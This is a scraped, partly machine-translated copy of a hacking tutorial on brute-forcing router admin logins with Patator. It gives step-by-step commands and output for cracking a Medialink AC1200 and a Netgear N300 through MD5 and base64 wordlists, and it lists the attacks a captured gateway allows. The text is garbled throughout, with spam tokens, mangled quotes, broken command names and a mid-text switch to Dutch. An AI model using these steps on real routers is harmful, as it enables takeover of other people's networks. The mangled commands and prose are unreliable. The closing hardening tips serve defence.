قالب وردپرس درنا توس
Home / Tips and Tricks / How to break into router ports with Patator «Null Byte :: WonderHowTo

How to break into router ports with Patator «Null Byte :: WonderHowTo



Router gateways are responsible for protecting every aspect of the configuration of a network. With unrestricted access to these privileged configurations, an attacker can perform a wide range of advanced attacks on a compromised Wi-Fi network.

Brute-Forcing Router Logins with Patator

After hacking a Wi-Fi router with tools such as Aircrack, Wifiphisher and Wifite2, there are several ways an attacker can explore to further compromise the network . One way is to immediately try to find a way to access the router's gateway. Assuming the gateway does not use standard credentials, the attacker will attempt to exploit a vulnerability in the router or perform a brute-force attack.

With access to the router's gateway and full control over the configurations, a hacker in this position of strength can perform a variety of attacks. They can do one of the following, and some.

  • Perform DNS poisoning attacks
  • make the router accessible remotely
  • change or manipulate forwarding ports
  • reset the gateway password
  • Inject JavaScript in a browser on the network
  • reset the Wi-Fi Fi name and password
  • install a modified firmware
  • change or delete login and system logs
  • change or deactivate the firewall

Patator, such as Hydra and Medusa, is a command-line brute-forcing tool. But Patator does things a little differently. The developers have tried to make Patator more reliable and flexible than its predecessors. My favorite feature of Patator is the raw_request module that allows penetration testers to forcefully force HTTP logins, just like the Burp Intruder module.

A general overview for an attack

To show that I am going to show how to use Patator against two popular consumer routers on Amazon. Not all router gateways process authentication exactly the same. I will show some sort of general procedure to be followed when carrying out such attacks.

  1. Recording a login request : A single login attempt is logged in Burp to analyze the request.
  2. Identify the parameters : It is important to determine where the dynamic parameters (ie username and password) are stored in the request. Some routers store authentication cookies and send the submitted passwords in different ways.
  3. Edit and save the unedited request : After the parameters have been identified, place a placeholder in the request to help Patator go through the desired word list.
  4. Generate a targeted word list : A targeted word list with 10,000 passwords is usually more effective than a word list with 10 million. Some routers hashed or encrypted the password in the client's browser before it is sent. The glossary should probably reflect that.
  5. Identity and filter of unsuccessful requests : with modern routers a successful login attempt will very rarely make itself known. Understanding and filtering HTTP status codes plays a major role in identifying the difference between a failed and successful login attempt.

Now a warning: Patator is not very beginner-friendly, so there is a bit of a learning curve with the syntax that you have to get used to. Before continuing, you must have a general understanding of HTTP requests, HTTP status codes and some experience with the Burp intrusion module.

Installing Patator on Kali Linux

My first attempts to install Patator using the GitHub repository failed. There seems to be a problem with Pip when installing the required dependencies. Fortunately, a slightly older version of Patator is available in the Kali Linux repository. Use the command below to update APT and install Patator.

  ~ $ apt-get update && apt-get install patator

Read package lists ... Ready
Build dependency structure
Read status information ... Done
The following additional packages are installed:
ca-certificates-java standard-jre standard-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libferdep-client2-2
libfeerdp2-2 libgif7 libwinpr2-2 openjdk-11-year openjdk-11-year-headless python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-
python3-psycopg2 unzip
Suggested packages:
libsasl2-modules-gssapi-mit | libsasl2-modules-gssapi-heimdal libnss-mdns fonts-ipafont-gothic fonts-ipafont-mincho fonts-wqy-microhei | fonts-wqy-zenhei fonts-indic default-mysql-server
| virtual-mysql-server python3-mysqldb-dbg python-nacl-doc python-openssl-doc python3-openssl-dbg python3-gssapi python-psycopg2-doc zip
The following NEW packages are installed:
ca-certificates-java standard-jre standard-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libferdep-client2-2
libfeerdp2-2 libgif7 libwinpr2-2 openjdk-11-year openjdk-11-year-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-naclon python3-naclon python
python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Must have 43.9 MB of archives.
After this operation, an additional 192 MB of disk space is used.
Do you want to continue? [Y/n]

Then use the option – help to check if Patator has been installed successfully and view the many available modules.

  ~ patator - help

Patator v0.7 (https://github.com/lanjelot/patator)
Use: patator module - help

Available modules:
+ ftp_login: Brute-force FTP
+ ssh_login: Brute-force SSH
+ telnet_login: Brute-force Telnet
+ smtp_login: Brute-force SMTP
+ smtp_vrfy: list valid users using SMTP VRFY
+ smtp_rcpt: list valid users with SMTP RCPT TO
+ finger_lookup: list valid users using Finger
+ http_fuzz: Brute-force HTTP
+ ajp_fuzz: Brute-force AJP
+ pop_login: Brute-force POP3
+ pop_passd: Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login: Brute-force IMAP4
+ ldap_login: Brute-force LDAP
+ smb_login: Brute-force SMB
+ smb_lookupsid: Brute-force SMB SID lookup
+ rlogin_login: Brute-force rlogin
+ vmauthd_login: Brute-force VMware Authentication Daemon
+ mssql_login: Brute-force MSSQL
+ oracle_login: Brute-force Oracle
+ mysql_login: Brute-force MySQL
+ mysql_query: Brute-force MySQL searches
+ rdp_login: Brute-force RDP (NLA)
+ pgsql_login: Brute-force PostgreSQL
+ vnc_login: Brute-force VNC
+ dns_forward: Forward DNS lookup
+ dns_reverse: reverse DNS lookup
+ snmp_login: Brute-force SNMP v1 / 2/3
+ ike_en: sum up IKE transformations
+ unzip_pass: brute-force the password for encrypted ZIP files
+ keystore_pass: brute-force the password for Java keystore files
+ sqlcipher_pass: brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack: Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz: Fuzz TCP services
+ dummy_test: test module 

As mentioned, we will focus on the module http_fuzz designed to force brutal HTTP logins and perform various types of web-based injection attacks (e.g. fuzzing ). View the available http_fuzz options using the following command:

  patator http_fuzz --help

Patator v0.7 (https://github.com/lanjelot/patator)
Use: http_fuzz  [global-options ...]

  Examples:
http_fuzz url = http: //10.0.0.1/FILE0 0 = paths.txt -x ignore: code = 404 -x ignore, retry: code = 500
http_fuzz url = http: //10.0.0.1/manager/html user_pass = COMBO00: COMBO01 0 = combos.txt -x ignore: code = 401
http_fuzz url = http: //10.0.0.1/phpmyadmin/index.php method = POST body = & # 39; pma_username = root & pma_password = FILE0 & server = 1 & lang = and & # 39; 0 = passwords.txt follow = 1 accept_cookie = 1 -x ignore: fgrep = & # 39; Cannot log in to the MySQL server & # 39;

Module options:
url: target url (scheme: // host [:port] / path? search query)
body: body data
header: use custom headers
method: method to use [GET|POST|HEAD|...]
raw_request: load request from file
scheme: scheme [http|https]
auto_urlencode: automatically performs URL coding [1|0]
user_pass: username and password for HTTP authentication (user: pass)
auth_type: HTTP authentication type [basic | digest | ntlm]
follow: follow each location diversion [0|1]
max_follow: diversion limit [5]
accept_cookie: store cookies to be issued in future requests [0|1]
proxy: proxy to be used (host: port)
proxy_type: proxy type [http|socks4|socks4a|socks5]
resolve: host name to be used to IP address resolution (host name: IP)
ssl_cert: SSL certificate file for client (cert + key in PEM format)
timeout_tcp: waiting seconds for a TCP handshake [10]
timeout: waiting seconds for an HTTP response [20]
before_urls: comma & # 39; s separated URL & # 39; s to be requested before the main request
before_header: use a custom header in the before_urls request
before_egrep: extract data from the before_urls response to place in the main request
after_urls: comma & # 39; s separated URL & # 39; s to be requested after the main request
max_mem: store no more than N bytes request + response data in memory [-1 (unlimited)]
persistent: use persistent connections [1|0]

Global options:
- view and close the version number of the program
-h, - help view and close this help message

Execution:
-x arg actions and conditions, see Syntax below
--start = N starts from offset N in the wordlist product
--stop = N stop at offset N
--resume = r1 [,rN] * resume previous run
-e arg encodes everything between two tags, see Syntax below
-C str separator string in combo files (default is & # 39;: & # 39;)
-X str separator string in conditions (default is & # 39;, & # 39;)
--allow-ignore-failures
malfunctions cannot be ignored with -x (this is per design
to prevent false negatives) this option overrides this
behaviour

optimization:
--rate-limit = N wait N seconds between each test (default is 0)
--timeout = N waits N seconds for a response before retrying the load
(default is 0)
--max attempts = N skip charge after N attempts (default is 4) (-1 before
unlimited)
-t N, --threads = N number of threads (default is 10)

logging:
-l DIR save output and response data in DIR
-L automatically save SFX to DIR / yyyy-mm-dd / hh: mm: ss_SFX
(By default, DIR is set to & # 39; / tmp / patator & # 39;)

Debugging:
-d, - enable debug debug messages

Syntax:
-x promotions: conditions

promotions: = promotion [,action] *
action: = "ignore" | "try again" | "free" | "stop" "Reset"
conditions: = state = value [,condition=value] *
state: = "code" | "size" | "time" "mesg" | "fgrep" | "egrep" | "Clen"

ignore: don't report
try again: try the load again
free: reject future comparable payloads
stop: end execution now
reset: close the current connection to reconnect next time

code: match status code
size: match size (N or N-M or N- or -N)
time: match time (N or N-M or N- or -N)
mesg: match message
fgrep: search for string in mesg
egrep: search for regex in mesg
clen: match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore: code = 302, fgrep = & # 39; Location: /home.html'

-e tag: coding

tag: = any unique string (e.g. T @ G or _ @@ _ or ...)
coding: = "hex" | "unhex" | "b64" | "md5" | "sha1" | "Url"

hex: code in hexadecimal
unhex: decoding hexadecimal
b64: code in base64
md5: hash in md5
sha1: hash in sha1
url: encode url

For example, to encrypt each password in base64:
... host = 10.0.0.1 user = admin password = _ @@ _ FILE0 _ @@ _ -e _ @@ _: b64

Read the README in for more examples and usage information. 

1. Attacking the Medialink AC1200 router

The first router to be attacked is the Medialink AC1200. It is currently one of Amazon's top choices for consumer routing and quite popular.

Step 1: Register a logon request with Burp

After Configure Firefox with the Proxy module of Burp Suite, navigate to the gateway of the AC1200 at http: / /192.168.8.1/login.html. cialis19659035 extensions How to break into router ports with Patator ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

Enter "password" in the password field and press Enter . Burp intercepts the login and displays the request below.

Step 2: Identify the parameters

Note the parameter password = is not "password" as expected, but instead the coded "5f4dcc3b5aa765d61d8327deb882cf99" string.

Those familiar with password hashing can recognize the hash as the MD5 for "password". It can be verified with the command below that prints the desired string in the command md5sum .

  ~ $ printf & # 39; password & # 39; | md5sum

5f4dcc3b5aa765d61d8327deb882cf99 - 

That tells us that the glossary used for brute-forcing the gateway must be in MD5 format. With this specific router, at the gateway, there is no available field for user name entry. We can see from the recorded request that the username & # 39; admin & # 39; already enclosed. So there is only one dynamic parameter: the password.

Step 3: Edit and save the raw request

Change the hashed password parameter to "FILE0" within the request. The change serves as a placeholder in the request that tells Patator where the passwords should be inserted. (In a later step it will be more logical.)

Right-click in the windows and select the "Copy to file" option. Save it in the / tmp folder with the file name "router_request.txt".

Step 4: Generate a Targeted Glossary

As we previously discovered, passwords are hashed in the browser before it is sent to the router for authentication. Patator has a built-in function for hashing passwords, but let's take this opportunity to learn some shortcut keys for Bash password manipulation.

Download a preferred glossary first. Every generic word list is suitable for testing purposes. Use the wget command below to download my glossary generated by analyzing leaked databases.

  ~ $ wget & # 39; https: //git.io/fhhvc' -O /tmp/wordlist.txt

--2020-01-15 03: 19: 58-- https://git.io/fhhvc
Resolving git.io (git.io) ... 52.7.169.168
Connect with git.io (git.io) | 52.7.169.168 |: 443 ... connected.
HTTP request sent, pending response ... 302 found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-03-08 03: 20: 01-- https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving Raw.githubusercontent.com (raw.githubusercontent.com) ... 151.101.68.133
Connect to raw.githubusercontent.com (raw.githubusercontent.com) | 151.101.68.133 |: 443 ... connected.
HTTP request sent, awaiting response ... 200 OK
Length: 25585 (25K) [text/plain]
Save in: "wordlist.txt"

wordlist.txt 100% [========================================>] 24.99K 68.9KB / s in 0.4s

2020-01-15 03:20:05 (68.9 KB / s) - & # 39; wordlist.txt & # 39; saved [25585/25585] 

The Bash one-liner below uses a for loop to pass through the passwords in the glossary. Each password is converted to an MD5 and added to the md5_wordlist.txt file.

  ~ $ for password in $ (cat /tmp/wordlist.txt); do printf "$ password" | md5sum | awk & # 39; {print $ 1} & # 39; >> /tmp/md5_wordlist.txt; done 

The new file md5_wordlist.txt can be viewed with the command head below to print the first ten lines.

  ~ $ head /tmp/md5_wordlist.txt

e10adc3949ba59abbe56e057f20f883e
e587466319da83fe4bdf4ceae9746357
dc483e80a7a0bd9ef71d8cf973673924
eba4820c4a707c3c72d16050177423b6
9924d38821446082ce5e4c9d88e1430f
b3d3bdba829b1f75755b22c20a14738
5f4dcc3b5aa765d61d8327deb882cf99
e680528370af6ef220d0f23b8e58e812
d234e0453a5f37630379880b9136e959
1acc444503b44377c3ba6e595fcf2940 

Step 5: Identify and filter failed requests

With the router_request.txt and the hashed password list, the router's gateway can be brutally forced with Patator with the following command. To stop the Patator attack at any time, press Control-C on the keyboard.

  ~ $ patator http_fuzz raw_request = / tmp / router_request.txt accept_cookie = 1 follow = 1 0 = / tmp / md5_wordlist .txt -l / tmp / AC1200 

To abort that command:

  • raw_request = – Use the router_request.txt created in an earlier step to generate login attempts against the router's gateway. [19659006] accept_cookie = – Save received cookies to issue in future requests.
  • follow = – Follow location redirects (e.g., 302 status codes), for both failed and successful login attempts when instructed by the server.
  • 0 = – The "FILE0" placeholder in the router_request.txt cycles through the offered password list.
  • -l – Export data to the specified folder. All Patator answers are stored in an organized way.

After executing the command my output looks like this:

  code size: clen time | candidate | number of mesg
-------------------------------------------------- ---------------------------
200 20: -1 0.015 | e10adc3949ba59abbe56e057f20f883e | 1 | HTTP / 1.0 200 OK
200 20: -1 0.035 | e587466319da83fe4bdf4ceae9746357 | 2 | HTTP / 1.0 200 OK
200 20: -1 0.048 | dc483e80a7a0bd9ef71d8cf973673924 | 3 | HTTP / 1.0 200 OK
200 20: -1 0.041 | eba4820c4a707c3c72d16050177423b6 | 4 | HTTP / 1.0 200 OK
200 20: -1 0.054 | 9924d38821446082ce5e4c9d88e1430f | 5 | HTTP / 1.0 200 OK
200 20: -1 0.060 | 5f4dcc3b5aa765d61d8327deb882cf99 | 7 | HTTP / 1.0 200 OK
200 20: -1 0.067 | 1acc444503b44377c3ba6e595fcf2940 | 10 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 25d55ad283aa400af464c76d713c07ad | 11 | HTTP / 1.0 200 OK
200 20: -1 0.069 | d8578edf8458ce06fbc5bb76a58c5ca4 | 12 | HTTP / 1.0 200 OK
200 20: -1 0.070 | bfcfa776182bf88f23cc0e78bde9bd55 | 13 | HTTP / 1.0 200 OK
200 20: -1 0.070 | 5fcfd41e547a12215b173ff47fdd3739 | 14 | HTTP / 1.0 200 OK
200 20: -1 0.070 | 02c75fb22c75b23dc963c7eb91a062cc | 15 | HTTP / 1.0 200 OK
200 20: -1 0.079 | b3d3bdba829b1fef75a5b22c20a14738 | 6 | HTTP / 1.0 200 OK
200 20: -1 0.070 | f26e6a5828c8a1c908f86c0674c4b0c1 | 16 | HTTP / 1.0 200 OK
200 20: -1 0.070 | 0d107d09f5bbe40cade3de5c71e9e9b7 | 17 | HTTP / 1.0 200 OK
200 20: -1 0.073 | e680528370af6ef220d0f23b8e58e812 | 8 | HTTP / 1.0 200 OK
200 20: -1 0.070 | 25f9e794323b453885f5181f1b624d0b | 18 | HTTP / 1.0 200 OK
200 20: -1 0.086 | d234e0453a5f37630379880b9136e959 | 9 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 9aaee58c21bf17a001b5325dffecbb6c | 19 | HTTP / 1.0 200 OK
200 20: -1 0.069 | c41788ac68e6c17c59a6412c424dc763 | 20 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 7702417fd301623eff2ba8f6abf05ff6 | 21 | HTTP / 1.0 200 OK
200 20: -1 0.069 | a79e7fabc870d2c67141008c58088b47 | 31 | HTTP / 1.0 200 OK
200 20: -1 0.069 | e99a18c428cb38d5f260853678922e03 | 22 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 4297f44b13955235245b2497399d7a93 | 32 | HTTP / 1.0 200 OK
200 20: -1 0.069 | e7d094da9fe5b55c3a84806ba4fd3276 | 23 | HTTP / 1.0 200 OK
200 20: -1 0.067 | 9ccc031dbebc6705fc8443df29b0971f | 33 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 04085330aed79347b6427f9111ce384f | 24 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 1c63129ae9db9c60c3e8aa94d3e00495 | 34 | HTTP / 1.0 200 OK
200 20: -1 0.069 | ccebddaa34a9459df50d2d32177ea06e | 25 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 5416d7cd6ef195a0f7622a9c56b55e84 | 26 | HTTP / 1.0 200 OK
200 20: -1 0.069 | dccfdb716551ca6210e9b93248674dd7 | 27 | HTTP / 1.0 200 OK
200 20: -1 0.069 | 1f6cac35000ad57b1af2e34926043ebe | 28 | HTTP / 1.0 200 OK
200 20: -1 0.069 | bed128365216c019988915ed3add75fb | 29 | HTTP / 1.0 200 OK
200 20: -1 0.069 | bc597773a32c44479efd83855733aed6 | 30 | HTTP / 1.0 200 OK
200 20: -1 0.071 | d5e0708d403467017d4dd217178112b5 | 41 | HTTP / 1.0 200 OK
200 20: -1 0.071 | 161ebd7d45089b3446ee4e0d86dbcf92 | 42 | HTTP / 1.0 200 OK
200 20: -1 0.070 | 5dc5d1aa29ea20ce91ec6c7fe5a44f56 | 43 | HTTP / 1.0 200 OK
200 20: -1 0.070 | 3d68b18bd9042ad3dc79643bde1ff351 | 44 | HTTP / 1.0 200 OK
200 20: -1 0.069 | b76be48e061aa8948d153fec67a08cb4 | 35 | HTTP / 1.0 200 OK
200 20: -1 0.071 | 3bf1289e5cd6187c0e0de34edfe27b90 | 45 | HTTP / 1.0 200 OK 

Hypertext Transfer Protocol (HTTP) status codes, also known as response codes are issued by web servers to our web browsers when we submit requests. These codes are a way for web servers to report errors to server administrators, web developers, and end users.

Sometimes the status code 200 ("200 OK") is an indication that the server has accepted the specified password. In these cases, every login attempt produces the "200 OK" response – so it helps to identify what a failed login attempt looks like.

The "size" column can also be very useful. It shows the size (in bytes) of the server's response to the login attempt. It returns 20 bytes with each login attempt, so it is probably safe to assume that this byte size indicates a failed login attempt, in which case it is safe to omit responses of that size. You can do this by ignoring the option -x: size = 20 and adding an argument.

  ~ $ patator http_fuzz raw_request = router_request.txt -x ignore: size = 20 accept_cookie = 1 follow = 1 0 = / tmp / md5_wordlist.txt -l / tmp / AC1200

code size: clen time | candidate | number of mesg
-------------------------------------------------- ---------------------------
200 3962: 3363 0.201 | d487dd0b55dfcacdd920ccbdaeafa351 | 291 | HTTP / 1.0 200 OK
Hits / Done / Skip / Fail / Size: 1/3142/0/0/3142, Avg: 138 r / s, Time: 0h 0m 22s 

Now only one request is displayed, with a size of 3,962 bytes.

There are a few ways to undo a discovered password. The passwords in both wordlist.txt and md5_wordlist.txt appear in the same order. The only difference is that one word list is in plain text; the other is hash.

Below we will use en to place a line number for each line in the md5_wordlist.txt, and then grep for the hash.

  ~ $ en /tmp/md5_wordlist.txt | grep & # 39; d487dd0b55dfcacdd920ccbdaeafa351 & # 39;

291 d487dd0b55dfcacdd920ccbdaeafa351 

The hash appears on line 291 of the md5_wordlist.txt file. Now use nl on the regular text dictionary and grep to find the line number.

  ~ $ en /tmp/wordlist.txt | grep & # 39; 291 & # 39;

291 yellow 

The password is "yellow". It can be further verified with the following command:

  ~ $ printf & # 39; yellow & # 39; | md5sum

d487dd0b55dfcacdd920ccbdaeafa351 

2. Attacking the Netgear N300 router

A Netgear N300 series router is on the following list of targets. It is also one of Amazon's top choices for entry-level, Wi-Fi routers for consumers.

Step 1: Capturing a logon request with Burp

We follow the same procedure as before, starting with capturing the rough request. Navigate to the router's gateway using a web browser configured for proxy via Burp. Enter the "admin" and "password" credentials when prompted.

Step 2: Identify the parameters

Note this time that there is no clear password = parameter such as the Medialink AC1200 router .

The above string is not hashed with MD5. Although it may seem encrypted or protected in some way, it uses simple base64 encryption. The string can be decoded with the command below.

  ~ $ printf & # 39; YWRtaW46cGFzc3dvcmQ = & # 39; | base64 -d

admin: password 

The username and password are merged into a single string and encrypted. This is called basic HTTP authentication. It should only be used with HTTPS, because an attacker on the network can easily capture the password.

Step 3: Change and save the unedited request

With the identified username and password parameters, the unedited request can be changed to record the Patator placeholder and save it to a local file.

Right-click in the windows and select the "Copy to file" option. Save it in the / tmp folder with the file name "router_request.txt".

Step 4: Generate a targeted word list

Now that we know what kind of authentication parameter exists, a word list can be generated specifically for the router. Again, Patator has a built-in function to encrypt passwords, but password manipulation is a good skill to learn. For example, it can be applied to other tools for brute forcing.

Download a generic glossary for testing purposes. Use the wget command below to download my glossary generated by analyzing leaked databases.

  ~ $ wget & # 39; https: //git.io/fhhvc' -O /tmp/wordlist.txt cialis19659028 below Bash one-liner will use a  for  loop to cycle through the passwords in the glossary. Each password is merged into a single string with the username and the password converted to base64. All coded strings added to the /tmp/base64_wordlist.txt file. 

  ~ $ for password in $ (cat /tmp/wordlist.txt); do printf "admin: $ password" | base64 >> /tmp/base64_wordlist.txt; done 

The encrypted passwords can be verified with the command head to print the first ten lines of the file.

  ~ $ head /tmp/base64_wordlist.txt

YWRtaW46MTIzNDU2
YWRtaW46QWJjZGVmMTIz
YWRtaW46YTEyMzQ1Ng ==
YWRtaW46bGl0dGx1MTIz
YWRtaW46bmFuZGEzMzQ =
YWRtaW46Tjk3bm9raWE =
YWRtaW46cGFzc3dvcmQ =
YWRtaW46UGF3ZXJqb24xMjM =
YWRtaW46NDIxdWlvcHkyNTg =
YWRtaW46TVl3b3JrbGlzdDEyMw == 

Step 5: Identify and filter failed requests

The router's gateway can be brutally forced with Patator using the router_request.txt and base64_wordlist.txt files. Remember that while Patator is busy, it can be stopped at any time by pressing Control-C on the keyboard.

  ~ $ patator http_fuzz raw_request = / tmp / router_request.txt accept_cookie = 1 follow = 1 0 = / tmp / base64_wordlist.txt -l / tmp / N300

code size: clen time | candidate | number of mesg
-------------------------------------------------- ---------------------------
401 508: -1 0.006 | YWRtaW46MTIzNDU2 | 1 | HTTP / 1.0 401 Not authorized
401 508: -1 0.023 | YWRtaW46MTIzNDU2Nzg = | 11 | HTTP / 1.0 401 Not authorized
401 508: -1 0.022 | YWRtaW46Y2h1cnUxMjNB | 21 | HTTP / 1.0 401 Not authorized
401 508: -1 0.023 | YWRtaW46QWJjZGVmMTIz | 2 | HTTP / 1.0 401 Not authorized
401 508: -1 0.024 | YWRtaW46cXdlcnR5 | 12 | HTTP / 1.0 401 Not authorized
401 508: -1 0.007 | YWRtaW46YTEyMzQ1Ng == | 3 | HTTP / 1.0 401 Not authorized
401 508: -1 0.024 | YWRtaW46bmtzMjMwa2pzODI = | 13 | HTTP / 1.0 401 Not authorized
401 508: -1 0.024 | YWRtaW46bGl0dGxlMTIz | 4 | HTTP / 1.0 401 Not authorized
401 508: -1 0.025 | YWRtaW46bmFuZGEzMzQ = | 5 | HTTP / 1.0 401 Not authorized
401 508: -1 0.026 | YWRtaW46enhjdmJubQ == | 15 | HTTP / 1.0 401 Not authorized
401 508: -1 0.023 | YWRtaW46Tjk3bm9raWE = | 6 | HTTP / 1.0 401 Unauthorized 

HTTP status codes are split into different categories or "classes". The first digit defines the categories and the following digits are subcategories that are specific to different types of error messages. For example, the 4xx categories are a class of errors specific to HTTP requests that the web server cannot comply with, such as trying to view a web page that does not exist. That is defined as a "404 not found" status, probably one of the best known status codes on the internet.

We immediately see a ton of 401 status codes, which are clear indications of failed login requests. These can be omitted from the output with the option -x ignore: code = 401 and argument.

  ~ $ patator http_fuzz raw_request = / tmp / router_request.txt -x ignore: code = 401 accept_cookie = 1 follow = 1 0 = / tmp / base64_wordlist.txt -l / tmp / N300

code size: clen time | candidate | number of mesg
-------------------------------------------------- ---------------------------
200 622: -1 0.017 | YWRtaW46cGFzc3dvcmQ = | 7 | HTTP / 1.0 200 OK 

Deze keer hebben we slechts één verzoek met de 200-statuscode ontvangen. De grootte van het antwoord is 622 bytes, meer dan dat van een mislukte 401-reactie. Het is een goed teken. De inloggegevens kunnen worden gedecodeerd met de volgende opdracht:

 ~ $ printf 'YWRtaW46cGFzc3dvcmQ =' | base64 -d

admin: wachtwoord 

Hoe u uzelf kunt beschermen tegen aanvallen van de routergateway

Regelmatig bijwerken van de firmware helpt tegen misbruik en Routersploit-aanvallen. Een sterk (niet-standaard) wachtwoord voorkomt brute-force aanvallen uitgevoerd met Patator.

  • Update de firmware . Routerbedrijven geven vaak bugs uit en exploiteren patches. Het is belangrijk om de routerfirmware up-to-date te houden en deze indien mogelijk automatisch op updates te laten controleren.
  • Extern beheer uitschakelen . Sommige routers staan ​​standaard externe toegang toe. Zonder het te weten, kunnen hackers uw router op internet vinden en de controle overnemen.
  • Standaardwachtwoorden wijzigen . Gebruik nooit de standaardwachtwoorden. Dit geldt voor het wifi-wachtwoord dat andere apparaten gebruiken om verbinding te maken met de router, maar ook voor het beheerdersportaal, waarmee u gevoelige routerinstellingen kunt wijzigen. Er zijn veel websites gewijd aan het delen van standaard beheerderswachtwoorden.
  • WPA2-codering . Gebruik alleen WPA2-codering. Zwakkere versleutelingsopties zoals WEP maken uw router extreem kwetsbaar voor aanvallers.
  • Schakel WPS uit . WPS is een functie die in de meeste routers is ontworpen en waarvan wordt verondersteld dat deze veilige toegang tot uw router zonder wachtwoord gemakkelijker maakt. Unfortunately, the feature is usually enabled by default and can be easily exploited by hackers.
  • Be persistent. Change your Wi-Fi password every few months. It's a pain to reset the Wi-Fi password on all your devices, but this tactic will keep hackers guessing — literally. If a hacker has captured a WPA2 handshake and spends several weeks trying to crack it, changing your password will render the captured handshake useless.

Unfortunately, none of the routers I tested support HTTPS when authenticating the admin. So an attacker on the network inspecting traffic will be able to passively discover the login password — even if it's a totally random 42-character password.

Don't Miss: Stealthfully Sniff Wi-Fi Activity Without Connecting to a Target Router

Cover photo and screenshots by tokyoneon/Null Byte

Source link